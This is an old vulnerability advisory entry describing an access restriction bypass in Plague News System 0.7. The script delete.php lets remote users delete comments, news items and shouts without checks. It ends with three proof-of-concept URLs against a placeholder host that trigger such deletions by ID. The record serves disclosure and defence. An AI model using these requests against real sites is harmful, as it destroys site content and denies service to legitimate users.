Plague News System 0.7 Delete.PHP Access Restriction Bypass Vulnerability

2014-07-01T00:00:00
ID SSV:79588
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/14139/info

Plague News System is prone to an access restriction bypass vulnerability. The issue exists due to a lack of sanity checks performed by 'delete.php' on deletion requests passed to the script.

A remote attacker may exploit this issue to delete site content and deny service for legitimate users. 

http://www.example.com/delete.php?comment=1&id=[ID of comment here]
http://www.example.com/delete.php?news=1&id=[ID of news here]
http://www.example.com/delete.php?shout=1&id=[ID of shout here]